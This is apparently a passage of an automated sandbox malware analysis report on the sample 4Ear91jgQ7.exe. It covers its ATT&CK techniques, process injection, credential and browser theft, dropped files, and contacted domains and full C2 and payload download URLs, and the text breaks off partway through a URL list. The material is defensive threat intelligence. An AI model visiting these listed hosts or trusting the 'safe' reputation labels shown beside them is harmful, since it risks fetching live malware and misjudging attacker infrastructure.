            Source: Yara matchFile source: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.3323096019.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.3325539754.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2388313008.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		1
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Command and Scripting Interpreter            		11
            Registry Run Keys / Startup Folder            		1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		LSASS Memory113
            System Information Discovery            		Remote Desktop Protocol1
            Data from Local System            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)612
            Process Injection            		1
            Abuse Elevation Control Mechanism            		Security Account Manager1
            Query Registry            		SMB/Windows Admin Shares1
            Email Collection            		3
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
            Registry Run Keys / Startup Folder            		2
            Obfuscated Files or Information            		NTDS241
            Security Software Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Timestomp            		LSA Secrets2
            Process Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials41
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
            Masquerading            		DCSync1
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Modify Registry            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt41
            Virtualization/Sandbox Evasion            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron612
            Process Injection            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1479336 Sample: 4Ear91jgQ7.exe Startdate: 23/07/2024 Architecture: WINDOWS Score: 100 86 www.valerieomage.com 2->86 88 www.kosherphonestore.com 2->88 90 11 other IPs or domains 2->90 102 Malicious sample detected (through community Yara rule) 2->102 104 Multi AV Scanner detection for dropped file 2->104 106 Multi AV Scanner detection for submitted file 2->106 108 5 other signatures 2->108 10 4Ear91jgQ7.exe 15 2 2->10         started        14 4Ear91jgQ7.pif 2 2->14         started        16 4Ear91jgQ7.pif.pif 2->16         started        18 7 other processes 2->18 signatures3 process4 dnsIp5 92 dual-spov-0006.spov-msedge.net 13.107.137.11, 443, 49704, 49706 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 10->92 122 Writes to foreign memory regions 10->122 124 Allocates memory in foreign processes 10->124 126 Injects a PE file into a foreign processes 10->126 20 RegAsm.exe 10->20         started        23 cmd.exe 1 10->23         started        25 cmd.exe 3 10->25         started        128 Multi AV Scanner detection for dropped file 14->128 130 Machine Learning detection for dropped file 14->130 28 cmd.exe 1 14->28         started        34 2 other processes 14->34 30 cmd.exe 16->30         started        36 2 other processes 16->36 94 13.107.139.11, 443, 49720, 49724 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 18->94 32 cmd.exe 18->32         started        38 18 other processes 18->38 signatures6 process7 file8 110 Maps a DLL or memory area into another process 20->110 40 NQKKZTlEHzDNbnTfYhwoCSpWHN.exe 20->40 injected 112 Drops PE files to the document folder of the user 23->112 114 Uses cmd line tools excessively to alter registry or file data 23->114 116 Drops PE files with a suspicious file extension 23->116 49 2 other processes 23->49 82 2 other malicious files 25->82 dropped 43 conhost.exe 25->43         started        51 2 other processes 28->51 53 2 other processes 30->53 55 2 other processes 32->55 68 C:\Users\user\Documents\4Ear91jgQ7.pif.pif, PE32 34->68 dropped 70 C:\...\4Ear91jgQ7.pif.pif:Zone.Identifier, ASCII 34->70 dropped 45 conhost.exe 34->45         started        72 C:\Users\user\...\4Ear91jgQ7.pif.pif.pif, PE32 36->72 dropped 74 C:\...\4Ear91jgQ7.pif.pif.pif:Zone.Identifier, ASCII 36->74 dropped 47 conhost.exe 36->47         started        76 C:\...\4Ear91jgQ7.pif.pif.pif.pif.pif.pif, PE32 38->76 dropped 78 C:\Users\...\4Ear91jgQ7.pif.pif.pif.pif.pif, PE32 38->78 dropped 80 C:\Users\user\...\4Ear91jgQ7.pif.pif.pif.pif, PE32 38->80 dropped 84 3 other malicious files 38->84 dropped 57 16 other processes 38->57 signatures9 process10 signatures11 118 Found direct / indirect Syscall (likely to bypass EDR) 40->118 59 findstr.exe 40->59         started        120 Creates multiple autostart registry keys 57->120 process12 signatures13 132 Tries to steal Mail credentials (via file / registry access) 59->132 134 Tries to harvest and steal browser information (history, passwords, etc) 59->134 136 Modifies the context of a thread in another process (thread injection) 59->136 138 3 other signatures 59->138 62 NQKKZTlEHzDNbnTfYhwoCSpWHN.exe 59->62 injected 66 firefox.exe 59->66         started        process14 dnsIp15 96 www.kosherphonestore.com.cdn.hstgr.net 84.32.84.121, 49728, 49730, 49732 NTT-LT-ASLT Lithuania 62->96 98 www.cwgehkk.store 43.155.26.241, 49739, 49742, 49744 LILLY-ASUS Japan 62->98 100 shops.myshopify.com 23.227.38.74, 49722, 80 CLOUDFLARENETUS Canada 62->100 140 Found direct / indirect Syscall (likely to bypass EDR) 62->140 signatures16

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            4Ear91jgQ7.exe13%ReversingLabs
            4Ear91jgQ7.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif100%Joe Sandbox ML
            C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif100%Joe Sandbox ML
            C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif100%Joe Sandbox ML
            C:\Users\user\Documents\4Ear91jgQ7.pif.pif100%Joe Sandbox ML
            C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif100%Joe Sandbox ML
            C:\Users\user\Documents\4Ear91jgQ7.pif100%Joe Sandbox ML
            C:\Users\user\Documents\4Ear91jgQ7.pif13%ReversingLabs
            C:\Users\user\Documents\4Ear91jgQ7.pif.pif13%ReversingLabs
            C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif13%ReversingLabs
            C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif13%ReversingLabs
            C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif13%ReversingLabs
            C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif13%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://onedrive.live.com0%Avira URL Cloudsafe
            http://www.cwgehkk.store/kwl6/?3F=ZLtxCXoX&oBG=a60HvCvUhLiFhuUSc8WrKARCzXFsQAvffUZBz2uIU9nHYJX4NGLIPasF9EYqD4O1NmBy69LXG4mImYvzxGn1S/csb+glCs2OenUaXJQynPXKXRJsgC/umNodRP7idNP7JA==0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.kosherphonestore.com/ktbm/?oBG=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgBfWJK+jN8eMH36uauFGPXBOtm3yBDVUMLLFQh/MQ7JKdaw==&3F=ZLtxCXoX0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            https://onedrive.live.com/download?resid=7EE64AC18753AFFC%2120205&authkey=0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://cdsf1g.db.files.1drv.com/y4mo4p-JVtoRBSqHrQiA9KeG1S6nMOtlwjW-1eDspeJcYnm3M5qDvMNKDA9M8fz9FBK0%Avira URL Cloudsafe
            https://cdsf1g.db.files.1drv.com/y4mfqQtLozj-9TM6Ba0WtMrYNaZZLYdZifHt7JSgEAwVuBfWo_gNuWKsrXMDkmnGIRA0%Avira URL Cloudsafe
            http://www.kosherphonestore.com/ktbm/0%Avira URL Cloudsafe
            https://cdsf1g.db.files.1drv.com/y4m4LKvhJ_pTnz9rawaJjs2KZErvU8neZdJYfN9Hc3hkDV_oDM8LwyhXl_csc1M6IVr0%Avira URL Cloudsafe
            https://cdsf1g.db.files.1drv.com/y4mUzOlIfy49nah4fKlzCWhYlTPZUFu9vAgDNS-S_X2t_nL0Y-9XGqjLW3kaagbac6F0%Avira URL Cloudsafe
            https://onedrive.live.com/download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo0%Avira URL Cloudsafe
            https://onedrive.live.com/download?resid=7EE64AC18753AFFC0%Avira URL Cloudsafe
            https://cdsf1g.db.files.1drv.com/y4mUBDVxFL0Km4dF6fb4nRGW7ZdjXIi96DMwMDKod96AJlGSBshmayLs2aYjkMajC8m0%Avira URL Cloudsafe
            http://www.cwgehkk.store/kwl6/0%Avira URL Cloudsafe
            https://www.kosherphonestore.com/ktbm/?oBG=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz0%Avira URL Cloudsafe
            http://www.cwgehkk.store0%Avira URL Cloudsafe
            http://www.valerieomage.com/c7rq/?oBG=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+smLAouLcyIEijMeq9ccv2ntai0EWGFrkjFC0U/c7k/DTDLA==&3F=ZLtxCXoX0%Avira URL Cloudsafe
            https://cdsf1g.db.files.1drv.com/y4mTVGq-8d-NYEWVY690_WG8M-flr_PfcRMpSRv1BSgDK_Xdu7-xjZQd9se4iAmRZer0%Avira URL Cloudsafe
            https://valerieomage.com/c7rq?oBG=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl0%Avira URL Cloudsafe
            https://cdsf1g.db.files.1drv.com/y4m55yNyrfmR788IlgrTwCE-wIZNwJTU2JVOtkkPb1qgGdeCZ2PORv3tzG8rnttZ1cB0%Avira URL Cloudsafe
            https://cdsf1g.db.files.1drv.com/y4mmRCyddZd8TgumTkc0WgJGPW0Be2KAP8RA1AGW9Yg-qGmwy0u0VLZAuymVEdH6LS20%Avira URL Cloudsafe
            https://cdsf1g.db.files.1drv.com/y4mP83fG79GWrLdMGamez0hrTjn2wKcdfccPJocaqFvFmy0YwM8XhejQeyEmWBqIIPJ0%Avira URL Cloudsafe
            https://cdsf1g.db.files.1drv.com0%Avira URL Cloudsafe
            https://cdsf1g.db.files.1drv.com/y4mE8p9HhoIpPnY2ZSkO-k2QoyiDP1eEVixXoeiZO3gSa-GRM46_Yn-B7ipY2YArCUE0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            dual-spov-0006.spov-msedge.net
            		13.107.137.11
            		truefalse
              		unknown
              www.kosherphonestore.com.cdn.hstgr.net
              		84.32.84.121
              		truefalse
                		unknown
                www.cwgehkk.store
                		43.155.26.241
                		truefalse
                  		unknown
                  shops.myshopify.com
                  		23.227.38.74
                  		truefalse
                    		unknown
                    onedrive.live.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.gospelstudygroup.org
                      		unknown
                      		unknowntrue
                        		unknown
                        cdsf1g.db.files.1drv.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.valerieomage.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.instantmailer.cloud
                            		unknown
                            		unknowntrue
                              		unknown
                              www.kosherphonestore.com
                              		unknown
                              		unknowntrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://www.cwgehkk.store/kwl6/?3F=ZLtxCXoX&oBG=a60HvCvUhLiFhuUSc8WrKARCzXFsQAvffUZBz2uIU9nHYJX4NGLIPasF9EYqD4O1NmBy69LXG4mImYvzxGn1S/csb+glCs2OenUaXJQynPXKXRJsgC/umNodRP7idNP7JA==false
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.kosherphonestore.com/ktbm/?oBG=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgBfWJK+jN8eMH36uauFGPXBOtm3yBDVUMLLFQh/MQ7JKdaw==&3F=ZLtxCXoXfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.kosherphonestore.com/ktbm/false
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.cwgehkk.store/kwl6/false
                                • Avira URL Cloud: safe
                                		unknown
                                https://onedrive.live.com/download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOofalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.valerieomage.com/c7rq/?oBG=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+smLAouLcyIEijMeq9ccv2ntai0EWGFrkjFC0U/c7k/DTDLA==&3F=ZLtxCXoXfalse
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://cdsf1g.db.files.1drv.com/y4mo4p-JVtoRBSqHrQiA9KeG1S6nMOtlwjW-1eDspeJcYnm3M5qDvMNKDA9M8fz9FBK4Ear91jgQ7.pif.pif.pif, 00000033.00000002.2936101972.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://duckduckgo.com/chrome_newtabfindstr.exe, 00000012.00000003.2696450717.0000000007C6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://duckduckgo.com/ac/?q=findstr.exe, 00000012.00000003.2696450717.0000000007C6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://onedrive.live.com/download?resid=7EE64AC18753AFFC%2120205&authkey=4Ear91jgQ7.exe, 00000000.00000002.2134410476.0000000002781000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000008.00000002.2316207257.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2468006286.0000000003353000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2578972763.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2703544606.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 0000002B.00000002.2833483953.0000000002421000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 00000033.00000002.2936101972.00000000031B3000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3183122274.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3094114349.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif.pif, 00000046.00000002.3251492052.0000000002B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.google.com/images/branding/product/ico/googleg_lodp.icofindstr.exe, 00000012.00000003.2696450717.0000000007C6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://onedrive.live.com4Ear91jgQ7.exe, 00000000.00000002.2134410476.0000000002781000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000008.00000002.2316207257.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2468006286.0000000003353000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2578972763.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2703544606.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 0000002B.00000002.2833483953.0000000002421000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 00000033.00000002.2936101972.00000000031B3000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3183122274.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3094114349.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif.pif, 00000046.00000002.3251492052.0000000002B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://cdsf1g.db.files.1drv.com/y4mfqQtLozj-9TM6Ba0WtMrYNaZZLYdZifHt7JSgEAwVuBfWo_gNuWKsrXMDkmnGIRA4Ear91jgQ7.pif, 00000011.00000002.2468006286.0000000003381000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=findstr.exe, 00000012.00000003.2696450717.0000000007C6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=findstr.exe, 00000012.00000003.2696450717.0000000007C6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://cdsf1g.db.files.1drv.com/y4m4LKvhJ_pTnz9rawaJjs2KZErvU8neZdJYfN9Hc3hkDV_oDM8LwyhXl_csc1M6IVr4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3094114349.0000000002DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://cdsf1g.db.files.1drv.com/y4mUzOlIfy49nah4fKlzCWhYlTPZUFu9vAgDNS-S_X2t_nL0Y-9XGqjLW3kaagbac6F4Ear91jgQ7.pif.pif, 0000001A.00000002.2578972763.0000000002D60000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.ecosia.org/newtab/findstr.exe, 00000012.00000003.2696450717.0000000007C6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://ac.ecosia.org/autocomplete?q=findstr.exe, 00000012.00000003.2696450717.0000000007C6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.cwgehkk.storeNQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000002.3345359746.00000000057F9000.00000040.80000000.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://cdsf1g.db.files.1drv.com/y4mUBDVxFL0Km4dF6fb4nRGW7ZdjXIi96DMwMDKod96AJlGSBshmayLs2aYjkMajC8m4Ear91jgQ7.pif, 00000008.00000002.2316207257.0000000002B20000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://onedrive.live.com/download?resid=7EE64AC18753AFFC4Ear91jgQ7.exe, 00000000.00000002.2134410476.0000000002781000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000008.00000002.2316207257.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2468006286.0000000003353000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2578972763.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2703544606.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 0000002B.00000002.2833483953.0000000002421000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 00000033.00000002.2936101972.00000000031B3000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3183122274.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3094114349.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif.pif, 00000046.00000002.3251492052.0000000002B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.kosherphonestore.com/ktbm/?oBG=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjizfindstr.exe, 00000012.00000002.3330731863.000000000426A000.00000004.10000000.00040000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000002.3339127333.0000000003C0A000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfindstr.exe, 00000012.00000003.2696450717.0000000007C6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://cdsf1g.db.files.1drv.com/y4mTVGq-8d-NYEWVY690_WG8M-flr_PfcRMpSRv1BSgDK_Xdu7-xjZQd9se4iAmRZer4Ear91jgQ7.exe, 00000000.00000002.2134410476.000000000283B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000008.00000002.2316207257.0000000002B8B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2468006286.00000000033EB000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2578972763.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2703544606.0000000002A6B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 0000002B.00000002.2833483953.00000000024DB000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 00000033.00000002.2936101972.000000000324B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3183122274.00000000030EC000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3094114349.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif.pif, 00000046.00000002.3251492052.0000000002C1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4Ear91jgQ7.exe, 00000000.00000002.2134410476.0000000002781000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000008.00000002.2316207257.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2468006286.0000000003353000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2578972763.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2703544606.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 0000002B.00000002.2833483953.0000000002421000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 00000033.00000002.2936101972.00000000031B3000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3183122274.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3094114349.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif.pif, 00000046.00000002.3251492052.0000000002B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://cdsf1g.db.files.1drv.com/y4m55yNyrfmR788IlgrTwCE-wIZNwJTU2JVOtkkPb1qgGdeCZ2PORv3tzG8rnttZ1cB4Ear91jgQ7.pif.pif.pif.pif.pif, 00000046.00000002.3251492052.0000000002BB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=findstr.exe, 00000012.00000003.2696450717.0000000007C6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://valerieomage.com/c7rq?oBG=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstlfindstr.exe, 00000012.00000002.3330731863.0000000003F46000.00000004.10000000.00040000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000002.3339127333.00000000038E6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000002C.00000002.2804570500.000000002FB16000.00000004.80000000.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://cdsf1g.db.files.1drv.com/y4mP83fG79GWrLdMGamez0hrTjn2wKcdfccPJocaqFvFmy0YwM8XhejQeyEmWBqIIPJ4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3183122274.0000000003081000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://cdsf1g.db.files.1drv.com/y4mmRCyddZd8TgumTkc0WgJGPW0Be2KAP8RA1AGW9Yg-qGmwy0u0VLZAuymVEdH6LS24Ear91jgQ7.pif.pif.pif, 0000002B.00000002.2833483953.0000000002470000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://cdsf1g.db.files.1drv.com4Ear91jgQ7.exe, 00000000.00000002.2134410476.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000008.00000002.2316207257.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2468006286.0000000003381000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2578972763.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2703544606.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 0000002B.00000002.2833483953.0000000002470000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 00000033.00000002.2936101972.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3183122274.0000000003081000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 